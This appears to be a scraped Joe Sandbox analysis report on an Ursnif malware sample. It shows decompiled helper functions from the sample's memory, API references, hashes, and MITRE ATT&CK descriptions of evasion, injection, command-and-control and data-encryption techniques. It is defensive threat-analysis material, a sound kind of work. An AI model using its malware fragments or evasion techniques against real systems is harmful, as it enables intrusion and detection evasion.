Instruction ID: b3fbeaab217e49c96bf2df84ecf8c70eaf375e14b03797e8b4f64c4cac50efdf
Opcode Fuzzy Hash: 2b0838a091047bc4568d6c357d42ff23abb60f80d942e81eb812c63f37583dd2
Instruction Fuzzy Hash: E311A871204F524AC721CA3E8C8863ABAEE9756132B37175DF0BB8E5F1D338D8869654

Uniqueness

Uniqueness Score: -1.00%

Function 70349292, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 703492C0
_free.LIBCMT ref: 703492E6

Strings

`"h, xrefs: 703492BB, 703492C8, 703492E1, 703492EE, 70349314

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: _free
String ID: `"h
API String ID: 269201875-1397603704
Opcode ID: 8e023461a03ee884bbb8b1135a3151995507883aef0e578fc7fc13ee88aeab0b
Instruction ID: 897c38d97d2497e4cbc8718b55b60caf09830ca5b246144adaee5fd91126b71e
Opcode Fuzzy Hash: 8e023461a03ee884bbb8b1135a3151995507883aef0e578fc7fc13ee88aeab0b
Instruction Fuzzy Hash: 3511D332A00704AAD7109F6AAC41F2D37E9AB42730F352667F522DF6D5D7B4D9428790

Uniqueness

Uniqueness Score: -1.00%

Function 7034E887, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 7034155B: RtlEnterCriticalSection.NTDLL(-7038D4B0), ref: 7034156A

RtlDeleteCriticalSection.NTDLL(`"h), ref: 7034E8EA
_free.LIBCMT ref: 7034E8F8

Strings

`"h, xrefs: 7034E8B1, 7034E8C8, 7034E8CD, 7034E8DE, 7034E8E9, 7034E8F0, 7034E8F5, 7034E8FE

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: CriticalSection$DeleteEnter_free
String ID: `"h
API String ID: 1836352639-1397603704
Opcode ID: 6036915591e47ec579ecaabc8271fc38588c25207501167f9db5274dbc8a391e
Instruction ID: f86e5e7435b42653f876ad58c01be9d87d78e5bef5f7374635a70e78e6b6ce8d
Opcode Fuzzy Hash: 6036915591e47ec579ecaabc8271fc38588c25207501167f9db5274dbc8a391e
Instruction Fuzzy Hash: 6F113A32A08218DFDB158B99D885FACB3F4FB05725F205259F5929F2E0CB78E942CB14

Uniqueness

Uniqueness Score: -1.00%

Function 7034935A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 7034E887: RtlDeleteCriticalSection.NTDLL(`"h), ref: 7034E8EA
Part of subcall function 7034E887: _free.LIBCMT ref: 7034E8F8

Part of subcall function 7034E932: _free.LIBCMT ref: 7034E956

RtlDeleteCriticalSection.NTDLL(`"h), ref: 70349383
_free.LIBCMT ref: 70349397

Strings

`"h, xrefs: 70349369, 70349376, 70349382, 7034939C

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: _free$CriticalDeleteSection
String ID: `"h
API String ID: 1906768660-1397603704
Opcode ID: 186dc4dbe0f9e49f2b1814f3c7f9a0411469d5f8747efe31a5197e93f372c8d7
Instruction ID: f06598ebe81f52f2530ffe934561d59a4a616c1bda23bb6b844b5254413eda14
Opcode Fuzzy Hash: 186dc4dbe0f9e49f2b1814f3c7f9a0411469d5f8747efe31a5197e93f372c8d7
Instruction Fuzzy Hash: 1AE09A33808010DFC6295B9AEC81E6D33E8BF492247751405F4028B1A0CB28BD828B98

Uniqueness

Uniqueness Score: -1.00%

Function 00C242AE, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00C242AE(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00C25FBC(_t2);
				if(_t34 != 0) {
					_t30 = E00C25FBC(_t28);
					if(_t30 == 0) {
						E00C213CC(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00C27838(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00C27838(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00c242ae
0x00c242b8
0x00c242ba
0x00c242c0
0x00c242c0
0x00c242c9
0x00c242cd
0x00c242d9
0x00c242dd
0x00c24351
0x00c242df
0x00c242df
0x00c242e3
0x00c242ea
0x00c242ed
0x00c24307
0x00c242f6
0x00c242f6
0x00c242fa
0x00c242fd
0x00c24302
0x00c24302
0x00c2430c
0x00c24334
0x00c2433a
0x00c2433d
0x00c2430e
0x00c24310
0x00c24318
0x00c24323
0x00c24328
0x00c24328
0x00c24344
0x00c2434b
0x00c2434c
0x00c2434c
0x00c242dd
0x00c2435c

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00C21314,00000000,00000000,00000000,050C9698,?,?,00C230D3,?,050C9698), ref: 00C242BA

Part of subcall function 00C25FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00C22035), ref: 00C25FC8

Part of subcall function 00C27838: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00C242E8,00000000,00000001,00000001,?,?,00C21314,00000000,00000000,00000000,050C9698), ref: 00C27846
Part of subcall function 00C27838: StrChrA.SHLWAPI(?,0000003F,?,?,00C21314,00000000,00000000,00000000,050C9698,?,?,00C230D3,?,050C9698,0000EA60,?), ref: 00C27850

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00C21314,00000000,00000000,00000000,050C9698,?,?,00C230D3), ref: 00C24318
lstrcpy.KERNEL32(00000000,00000000), ref: 00C24328
lstrcpy.KERNEL32(00000000,00000000), ref: 00C24334

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: afede8f6749e199fa16adedd20bdb0d9b2972bb2e60438dc84c0dc18abbfc139
Instruction ID: 08fda367b9874030972200f99092132e388c689f9d0d564fb39f4c10f1e1991e
Opcode Fuzzy Hash: afede8f6749e199fa16adedd20bdb0d9b2972bb2e60438dc84c0dc18abbfc139
Instruction Fuzzy Hash: D621B472504665ABCB129F68EC85BAFBFB8EF09380F044054F9199BA21D731DA01D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00C21370, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C21370(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00C25FBC(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00c21385
0x00c21389
0x00c21393
0x00c2139a
0x00c2139d
0x00c2139f
0x00c213a7
0x00c213ac
0x00c213ba
0x00c213bf
0x00c213c9

APIs

lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,050C930C,?,00C253B4,004F0053,050C930C,?,?,?,?,?,?,00C25131), ref: 00C21380
lstrlenW.KERNEL32(00C253B4,?,00C253B4,004F0053,050C930C,?,?,?,?,?,?,00C25131), ref: 00C21387

Part of subcall function 00C25FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00C22035), ref: 00C25FC8

memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,00C253B4,004F0053,050C930C,?,?,?,?,?,?,00C25131), ref: 00C213A7
memcpy.NTDLL(74B069A0,00C253B4,00000002,00000000,004F0053,74B069A0,?,?,00C253B4,004F0053,050C930C), ref: 00C213BA

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 155e33e652506bd0814968fbd80c29cdba8ec545c95b65393093abc87a3c5d3d
Instruction ID: a6e063a904be16656018b6b7729597c6a86ae70af022bda8876df5820a12c355
Opcode Fuzzy Hash: 155e33e652506bd0814968fbd80c29cdba8ec545c95b65393093abc87a3c5d3d
Instruction Fuzzy Hash: 16F03C32900128BBCF10DBA8DC85D8F7BACEF082547054062FA04D7112E731EA159BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C25C8D, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(050C887A,00000000,00000000,00000000,00C24AC6,00000000), ref: 00C25C9D
lstrlen.KERNEL32(?), ref: 00C25CA5

Part of subcall function 00C25FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00C22035), ref: 00C25FC8

lstrcpy.KERNEL32(00000000,050C887A), ref: 00C25CB9
lstrcat.KERNEL32(00000000,?), ref: 00C25CC4

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: d874b5132504bdc42cba010787f8d88dfafc379d3a0bdedab2bbea1c7e9541f6
Instruction ID: 9d8c8ec9303cd514bd66bd60e441fb13639451e5acc77ec9a36e07d21e888a96
Opcode Fuzzy Hash: d874b5132504bdc42cba010787f8d88dfafc379d3a0bdedab2bbea1c7e9541f6
Instruction Fuzzy Hash: 96E0ED73911625A787219BE8AC48E9FBBACFF9D651704041AF60493620C73499069BA5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report start[2021.09.09_15-26].vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Function 00C23276, Relevance: 18.2, APIs: 12, Instructions: 163
encryptionCOMMON

Function 7038F0B0, Relevance: 13.8, APIs: 9, Instructions: 318
memoryCOMMON

Function 703314FE, Relevance: 13.6, APIs: 9, Instructions: 107
sleepnativesynchronizationCOMMON

Function 703310ED, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 00C26CD6, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Function 00C240DC, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 70331382, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 70331A0A, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 70331B4A, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 00C248C2, Relevance: 34.7, APIs: 23, Instructions: 220
memorystringCOMMON

Function 00C250A3, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Function 00C2682B, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
sleepmemorytimeCOMMON

Function 00C266CE, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 00C2435F, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Function 00C25FD1, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 00C27156, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Function 70331E91, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 70331DA0, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 70331D2D, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 00C213E1, Relevance: 6.1, APIs: 4, Instructions: 120
synchronizationCOMMON

Function 70331B8C, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 7033149B, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 00C2142C, Relevance: 4.6, APIs: 3, Instructions: 96
COMMON

Function 00C25335, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Function 70332042, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 70331768, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre